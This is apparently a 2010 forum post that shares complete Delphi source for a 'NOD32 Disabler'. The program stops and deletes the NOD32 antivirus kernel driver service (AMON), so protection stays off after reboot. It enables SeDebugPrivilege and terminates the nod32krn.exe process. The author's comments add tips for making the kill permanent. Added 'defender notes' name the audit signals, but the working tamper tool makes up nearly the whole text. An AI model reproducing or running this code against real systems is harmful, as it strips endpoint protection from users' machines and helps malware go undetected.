
WestSide 20.11.2010 23:01

Nod32 Disabler
 

Program AntiNod32;
{
  NOD32 Disabler by FuXdas aka CyberPunk
  13/09/2006
  ---------------------------------------

}

{$APPTYPE CONSOLE}

Uses Windows, TLHelp32, WinSvc;

Const
  // Console banner printed by the main block before it prompts for 'yes'.
  Welcome = ' Coded by FuXdas ~ [email protected]'+#13#10+
            ' www.instinctcoders.com'+#13#10+#13#10+
            ' WARNING!!, This Application demonstrate how disable NOD32 Protection.'+#13#10+
            ' Source code is included, Tested on NOD32 NT version, '+#13#10+
            ' Type yes if u want to disable NOD32 protection'+#13#10;

  // Process access right handed to OpenProcess in KillNod32.  The Windows unit
  // already declares a constant of this name and value; this local copy shadows it.
  PROCESS_TERMINATE = $0001;
  // Service name that StopNodDriver / UnrNodDrv open through the SCM.
  DrvName: PChar = 'AMON';  // Nod32 core Kernel Driver
  // Image file name that KillNod32 compares (case-sensitively) against each
  // process entry's szExeFile after stripping the directory.
  SrvName: PChar = 'nod32krn.exe';

//--- We will stop the nod driver with this function
// Note that it works like a service
Function StopNodDriver(): Boolean;
// Sends SERVICE_CONTROL_STOP to the service named by DrvName.
// Returns True only when ControlService reports success; False when the SCM
// could not be opened or the stop request was refused.
// Defender note: a user-mode console process stopping a security product's
// driver service through the SCM is worth auditing; SERVICE_STOP on such a
// service normally requires administrative rights, so this has to run elevated.
Var
  SCManager, Service: SC_Handle;
  ServiceStatus: TServiceStatus;
Begin
  Result := False;
  SCManager := OpenSCManager(Nil, Nil, SC_MANAGER_CONNECT);
  If SCManager = 0 Then Exit;
  Try
    // NOTE(review): the OpenService result is not checked; if it is 0 the
    // handle is still passed to ControlService (which then fails, leaving
    // Result False) and to CloseServiceHandle.
    Service := OpenService(SCManager, PChar(DrvName), SERVICE_STOP);
    If ControlService(Service, SERVICE_CONTROL_STOP, ServiceStatus) Then
      Result := True;
    CloseServiceHandle(Service);
  Finally
    // the SCM handle is released even if the stop attempt raised
    CloseServiceHandle(SCManager);
  End;
End;
//Unregistering nod's driver
// This will remove driver's keys from registry
Function UnrNodDrv(): Boolean;
// Opens the DrvName service and calls DeleteService on it, which marks the
// service for removal by the SCM (its configuration is dropped once the
// service is stopped and every handle to it is closed).  Returns True only
// when DeleteService succeeds.  Together with StopNodDriver this is what
// keeps the driver from coming back at the next boot.
// Defender note: deletion of a security product's service is a high-value
// tamper signal for endpoint monitoring and service-configuration auditing.
Var
  SCManager, Service: SC_Handle;
Begin
  Result := False;
  SCManager := OpenSCManager(Nil, Nil, SC_MANAGER_CONNECT);
  If SCManager = 0 Then Exit;
  Try
    // STANDARD_RIGHTS_REQUIRED includes DELETE, which is the right DeleteService needs.
    Service := OpenService(SCManager, PChar(DrvName), STANDARD_RIGHTS_REQUIRED);
    // Unlike StopNodDriver, the service handle is checked before it is used.
    If Service <> 0 Then
      If DeleteService(Service) Then
        Result := True;
    CloseServiceHandle(Service);
  Finally
    CloseServiceHandle(SCManager);
  End;
End;

//- we will need some privilege
procedure SetTokenPrivileges;
// Enables SeDebugPrivilege in the current process token so that KillNod32's
// OpenProcess call is less likely to be refused.  Skipped entirely on the
// Win9x platform family (VER_PLATFORM_WIN32_WINDOWS), which has no tokens.
// Nothing is reported back: every API result is ignored, and the try/except
// is effectively inert because these Win32 calls signal failure through
// their return values rather than by raising exceptions.
// Defender note: a process enabling SeDebugPrivilege is a common precursor to
// tampering with other processes; token-right adjustments are auditable on Windows.
var
  hToken1, hToken2, hToken3: THandle;
  TokenPrivileges: TTokenPrivileges;
  Version: OSVERSIONINFO;
begin
  Version.dwOSVersionInfoSize := SizeOf(OSVERSIONINFO);
  GetVersionEx(Version);
  if Version.dwPlatformId <> VER_PLATFORM_WIN32_WINDOWS then
  begin
    try
      OpenProcessToken(GetCurrentProcess, TOKEN_ADJUST_PRIVILEGES, hToken1);
      // hToken2 is the same handle as hToken1, so the second
      // AdjustTokenPrivileges call below simply repeats the first one.
      hToken2 := hToken1;
      LookupPrivilegeValue(nil, 'SeDebugPrivilege', TokenPrivileges.Privileges[0].luid);
      TokenPrivileges.PrivilegeCount := 1;
      TokenPrivileges.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
      // hToken3 serves as the ReturnLength out-parameter here, not as a token handle.
      hToken3 := 0;
      AdjustTokenPrivileges(hToken1, False, TokenPrivileges, 0, PTokenPrivileges(nil)^, hToken3);
      TokenPrivileges.PrivilegeCount := 1;
      TokenPrivileges.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
      hToken3 := 0;
      AdjustTokenPrivileges(hToken2, False, TokenPrivileges, 0, PTokenPrivileges(nil)^, hToken3);
      // hToken2 aliases hToken1, so closing hToken1 releases the only token handle held.
      CloseHandle(hToken1);
    except;
    end;
  end;
end;

Function ExtractFileName(s: String): String;
// Returns the part of s that follows its last backslash, or s itself when it
// contains none (an empty s yields '').  Only '\' is treated as a separator.
// This local definition shadows SysUtils.ExtractFileName, which is not in
// the Uses list of this program.
Var
  idx: integer;
Begin
  idx := length(s);
  // Walk backwards until a backslash is found or the string is exhausted;
  // idx ends up as the 1-based index of the last '\', or 0 if there is none.
  While idx > 0 Do
  Begin
    If s[idx] = '\' Then Break;
    Dec(idx);
  End;
  result := copy(s, idx + 1, length(s));
End;

//--- Yeah killing Nod's services
//After stopping Nod's driver we need to kill the service
// And like this nod32krn.exe will need to load the driver, but can't because the driver is stopped
//-- By the way after some research I have found that Nod injects 2 or 3 threads in 'services.exe'
// and like this if killed, it will be restarted by the remote thread.
// so if u want to completely kill nod's service u must kill the 2 threads in 'services.exe'
Function KillNod32(): integer;
// Walks a Toolhelp process snapshot and calls TerminateProcess on every
// process whose image file name (after ExtractFileName) equals SrvName.
// Returns the Integer value of the last TerminateProcess result (non-zero on
// success), or 0 when no process matched.  Nothing here verifies that the
// process actually went away.
// Defender note: OpenProcess(PROCESS_TERMINATE) followed by TerminateProcess
// against a security product's process is exactly the cross-process access
// that endpoint process-access telemetry is meant to surface; the author's
// comment above also claims the product restarts itself from threads it
// placed in services.exe, which would make the kill short-lived.
Var
  ContinueLoop: BOOL;
  FSnapshotHandle: THandle;
  FProcessEntry32: TProcessEntry32;
Begin
  result := 0;
  // enable SeDebugPrivilege first; failures inside are silently ignored
  SetTokenPrivileges;
  // If the snapshot fails, Process32First returns False and the loop never runs.
  FSnapshotHandle := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
  FProcessEntry32.dwSize := Sizeof(FProcessEntry32);
  ContinueLoop := Process32First(FSnapshotHandle, FProcessEntry32);
  While integer(ContinueLoop) <> 0 Do
  Begin
    // String = PChar comparison is case-sensitive, so only an exact-case
    // 'nod32krn.exe' matches.
    If (ExtractFileName(FProcessEntry32.szExeFile)) = SrvName Then
      // NOTE(review): the handle returned by OpenProcess is never closed, and
      // BOOL(0) is bInheritHandle = False.  Result keeps only the last outcome.
      Result := Integer(TerminateProcess(OpenProcess(
        PROCESS_TERMINATE, BOOL(0),
        FProcessEntry32.th32ProcessID), 0));
    ContinueLoop := Process32Next(FSnapshotHandle,
      FProcessEntry32);
  End;
  CloseHandle(FSnapshotHandle);
End;

var
  s:string;
// Program entry point.  Prints the banner, requires the exact answer 'yes'
// (case-sensitive, no trimming), then runs the three steps in order: stop the
// driver service, delete it, terminate nod32krn.exe.  After a failed step it
// waits for a keypress and carries on anyway.  A final readln keeps the
// console window open.
Begin
//- yep just to demonstrate, )) u can remove all that shits
///
  WriteLn(welcome);
  ReadLn(s);
  If s = 'yes' then
  Begin
  //-- This one is the most important we must stop the driver
  If StopNodDriver() Then
    WriteLn(' Stoping Nod32 driver ok ')
  Else
  Begin
    WriteLn(' Failed to stop Nod32 driver,any key to continue....');
    Readln;
  End;
    //-- u can remove this function if u want that nod that start in the next boot
    ///
  If UnrNodDrv() Then
    WriteLn(' Unregistring Nod32 driver ok')
  Else
  Begin
    WriteLn(' Error while trying to Unregister Nod32 Driver,any key to continue...');
    ReadLn;
  End;
  // Inline-asm call of KillNod32.  Its Integer result (left in EAX) is
  // discarded, so a failed termination is never reported to the user.
  Asm
    Call KillNod32 //;))
    // After this the NOD's realtime protection will be disabled completly
    // and we don't need a reboot
    //- and if u use StopNodDriver() nod will be disabled also after the reb0ot
    // So be carefull

  End;
end;
readln
// Cya FuXdas
// contact: [email protected]
//          www.instinctcoders.com
End.


